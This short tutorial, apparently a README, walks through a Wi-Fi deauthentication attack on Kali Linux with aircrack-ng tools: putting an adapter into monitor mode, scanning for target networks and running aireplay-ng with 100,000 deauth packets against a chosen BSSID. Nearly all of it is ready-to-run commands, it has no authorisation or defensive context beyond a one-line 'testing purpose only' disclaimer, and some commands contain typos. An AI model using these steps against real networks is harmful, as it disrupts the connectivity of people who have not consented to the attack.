
OS:Kali linux
Tested with : TP-Link TL-WN722N (newer devices will not support monitoring mode!)
------------------------------------------------------------------------------------------------------------------------------------------------------------
First of all you need to be in root mode in Kali linux and make sure your wi-fi device is supporting the Monitoring mode after, that open terminal and type :

sudo -i 

and type your password which is for default : kali

after entering root mode type 

iwconfig 

to see you wireles device name in our case it is wlan0 and it is in Manual mode we need to change the mode to Monitor for that use command :

airmon-ng start wlan0

and kill some task that can interupt the monitoring with command:

airmon-ng check kill 

check again if the device is switched to Monitor mode with :

iwconfig

if so we need to scan for our wirelless targets with command :

airodump-ng wlan0

after we see targets press CTRL+C to stop scanning and copy the target BSSID and begin the attack with command:

aireplay-ng -0 100000 -a [the BSSID of the target] [our device name in our case just type wlan0]

example: 
-   aireplay-ng -0 100000 -a 00:A0:03:2B:D6:43 wlan0

If target is with different channel stop wlan0 and start again with defined channel!

example:
-  airmon-ng start waln0 6
-  airmon-ng stop waln0

and you will see the packages, you can stop the attack with CTRL+C

----------------------------------------------------------------------------------------------------------------------------------------
For testing purpose only!!!
-------------------------------------------------------------------------------------------------------------------------------------

